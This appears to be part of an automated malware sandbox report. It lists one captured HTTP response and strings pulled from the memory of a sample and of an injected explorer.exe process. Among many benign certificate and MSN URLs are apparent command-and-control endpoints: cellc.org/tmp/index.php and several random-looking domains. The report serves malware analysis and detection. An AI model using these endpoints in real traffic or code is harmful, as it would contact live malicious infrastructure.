        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 02 May 2024 18:49:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: explorer.exe, 00000011.00000000.2276485731.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
        Source: explorer.exe, 00000011.00000002.2874485823.000000000CA42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/B
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/n
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/p
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/s
        Source: explorer.exe, 00000011.00000002.2873048284.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2874485823.000000000CA42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2864144911.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/tmp/index.php
        Source: explorer.exe, 00000011.00000002.2873048284.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/tmp/index.php&jz
        Source: explorer.exe, 00000011.00000002.2864144911.0000000001248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/tmp/index.php.ini
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/tmp/index.php/m
        Source: explorer.exe, 00000011.00000002.2864144911.0000000001248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/tmp/index.phpZ
        Source: explorer.exe, 00000011.00000002.2864144911.0000000001248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/tmp/index.phpc
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/tmp/index.phpngs
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/tmp/index.phpngsA
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/tmp/index.phpngsV
        Source: explorer.exe, 00000011.00000002.2873048284.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/tmp/index.phprk
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CADE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org:80/tmp/index.php
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CADE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org:80/tmp/index.phpP
        Source: file.exeString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q
        Source: file.exe, 00000000.00000003.1602868846.0000000002826000.00000004.00000020.00020000.00000000.sdmp, Cube.0.dr, Existence.pif.1.dr, ssjhrji.17.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
        Source: file.exe, 00000000.00000003.1602868846.0000000002826000.00000004.00000020.00020000.00000000.sdmp, Cube.0.dr, Existence.pif.1.dr, ssjhrji.17.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
        Source: file.exe, 00000000.00000003.1602868846.0000000002826000.00000004.00000020.00020000.00000000.sdmp, Cube.0.dr, Existence.pif.1.dr, ssjhrji.17.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
        Source: file.exe, 00000000.00000003.1602868846.0000000002826000.00000004.00000020.00020000.00000000.sdmp, Cube.0.dr, Existence.pif.1.dr, ssjhrji.17.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
        Source: file.exe, 00000000.00000003.1602868846.0000000002826000.00000004.00000020.00020000.00000000.sdmp, Cube.0.dr, Existence.pif.1.dr, ssjhrji.17.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
        Source: explorer.exe, 00000011.00000000.2276485731.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
        Source: explorer.exe, 00000011.00000000.2276485731.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
        Source: file.exeString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
        Source: file.exeString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://dgqkmisxnbbni.net/
        Source: explorer.exe, 00000011.00000002.2874485823.000000000CA42000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://jyvmasmiydvgjuu.org/
        Source: explorer.exe, 00000011.00000002.2874485823.000000000CA42000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://jyvmasmiydvgjuu.org/s
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://khjhprifrxebx.net/
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://kxgtxppvhlmsi.net/
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ndsmsdugaunva.net/
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ndsmsdugaunva.net/gs
        Source: file.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: explorer.exe, 00000011.00000000.2276485731.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: explorer.exe, 00000011.00000000.2274432480.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
        Source: file.exe, 00000000.00000003.1602868846.0000000002826000.00000004.00000020.00020000.00000000.sdmp, Cube.0.dr, Existence.pif.1.dr, ssjhrji.17.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
        Source: file.exe, 00000000.00000003.1602868846.0000000002826000.00000004.00000020.00020000.00000000.sdmp, Cube.0.dr, Existence.pif.1.dr, ssjhrji.17.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
        Source: file.exe, 00000000.00000003.1602868846.0000000002826000.00000004.00000020.00020000.00000000.sdmp, Cube.0.dr, Existence.pif.1.dr, ssjhrji.17.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
        Source: file.exe, 00000000.00000003.1602868846.0000000002826000.00000004.00000020.00020000.00000000.sdmp, Cube.0.dr, Existence.pif.1.dr, ssjhrji.17.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
        Source: file.exeString found in binary or memory: http://ocsps.ssl.com0
        Source: ssjhrji, 00000013.00000002.2866115104.0000000003D96000.00000004.00000020.00020000.00000000.sdmp, ssjhrji, 00000013.00000003.2538497281.0000000003D96000.00000004.00000020.00020000.00000000.sdmp, ssjhrji, 00000013.00000003.2537510876.0000000003D96000.00000004.00000020.00020000.00000000.sdmp, ssjhrji, 00000013.00000003.2536709501.0000000003D97000.00000004.00000020.00020000.00000000.sdmp, ssjhrji, 00000013.00000003.2535914841.0000000003D97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purl.oen
        Source: explorer.exe, 00000011.00000002.2873048284.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://qkoxdyhgicus.org/
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://qkoxdyhgicus.org/gs
        Source: file.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
        Source: file.exeString found in binary or memory: http://s.symcd.com06
        Source: explorer.exe, 00000011.00000000.2277176998.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870993996.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
        Source: explorer.exe, 00000011.00000000.2277176998.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870993996.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
        Source: explorer.exe, 00000011.00000000.2277365932.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000011.00000002.2869423152.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000011.00000000.2275324943.0000000007F40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
        Source: file.exe, 00000000.00000003.1602868846.0000000002826000.00000004.00000020.00020000.00000000.sdmp, Cube.0.dr, Existence.pif.1.dr, ssjhrji.17.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
        Source: file.exe, 00000000.00000003.1602868846.0000000002826000.00000004.00000020.00020000.00000000.sdmp, Cube.0.dr, Existence.pif.1.dr, ssjhrji.17.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
        Source: file.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
        Source: file.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
        Source: file.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
        Source: explorer.exe, 00000011.00000002.2873048284.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2874517414.000000000CADE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://uwgftqaxwugurgs.com/
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CADE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://uwgftqaxwugurgs.com/application/x-www-form-urlencodedMozilla/5.0
        Source: file.exe, 00000000.00000003.1634632525.0000000002823000.00000004.00000020.00020000.00000000.sdmp, Existence.pif, 0000000A.00000000.1679486685.0000000000805000.00000002.00000001.01000000.00000005.sdmp, Existence.pif, 00000010.00000002.2288146522.0000000000805000.00000002.00000001.01000000.00000005.sdmp, ssjhrji, 00000013.00000002.2864587716.0000000000BA5000.00000002.00000001.01000000.00000008.sdmp, Spell.0.dr, Existence.pif.1.dr, ssjhrji.17.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://yyyjoidqibgvbs.net/
        Source: Existence.pif, 0000000A.00000003.2226148637.000000000144C000.00000004.00000020.00020000.00000000.sdmp, Existence.pif, 0000000A.00000003.2226071840.0000000001435000.00000004.00000020.00020000.00000000.sdmp, Existence.pif, 0000000A.00000002.2229992386.0000000001453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/
        Source: Existence.pif, 0000000A.00000002.2230160337.00000000014F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/16G965
        Source: Existence.pif, 0000000A.00000002.2230160337.00000000014F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/16G965Z
        Source: Existence.pif, 0000000A.00000002.2230160337.00000000014F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/16G965u
        Source: explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
        Source: explorer.exe, 00000011.00000000.2279035434.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
        Source: explorer.exe, 00000011.00000002.2867686407.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
        Source: explorer.exe, 00000011.00000002.2867686407.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
        Source: explorer.exe, 00000011.00000000.2279035434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
        Source: explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSE
        Source: explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSN
        Source: explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSd
        Source: explorer.exe, 00000011.00000000.2276485731.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
        Source: explorer.exe, 00000011.00000000.2276485731.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
        Source: explorer.exe, 00000011.00000000.2272845685.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2865873250.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2864144911.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2273404133.0000000003700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
        Source: explorer.exe, 00000011.00000000.2276485731.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
        Source: explorer.exe, 00000011.00000000.2276485731.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
        Source: explorer.exe, 00000011.00000000.2276485731.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
        Source: explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
        Source: explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
        Source: explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
        Source: explorer.exe, 00000011.00000000.2274432480.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
        Source: explorer.exe, 00000011.00000000.2274432480.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
        Source: file.exe String found in binary or memory: https://d.symcb.com/cps0%
        Source: file.exe String found in binary or memory: https://d.symcb.com/rpa0
        Source: file.exe String found in binary or memory: https://d.symcb.com/rpa0.
        Source: explorer.exe, 00000011.00000000.2279035434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
        Source: explorer.exe, 00000011.00000000.2274432480.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
        Source: explorer.exe, 00000011.00000000.2279035434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com_
        Source: explorer.exe, 00000011.00000000.2279035434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CADE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/
        Source: explorer.exe, 00000011.00000000.2279035434.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C557000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/L
        Source: explorer.exe, 00000011.00000000.2279035434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2873048284.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.com
        Source: file.exe, 00000000.00000003.1602868846.0000000002826000.00000004.00000020.00020000.00000000.sdmp, Cube.0.dr, Existence.pif.1.dr, ssjhrji.17.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
        Source: ssjhrji.17.dr String found in binary or memory: https://www.globalsign.com/repository/0
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
        Source: explorer.exe, 00000011.00000000.2274432480.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
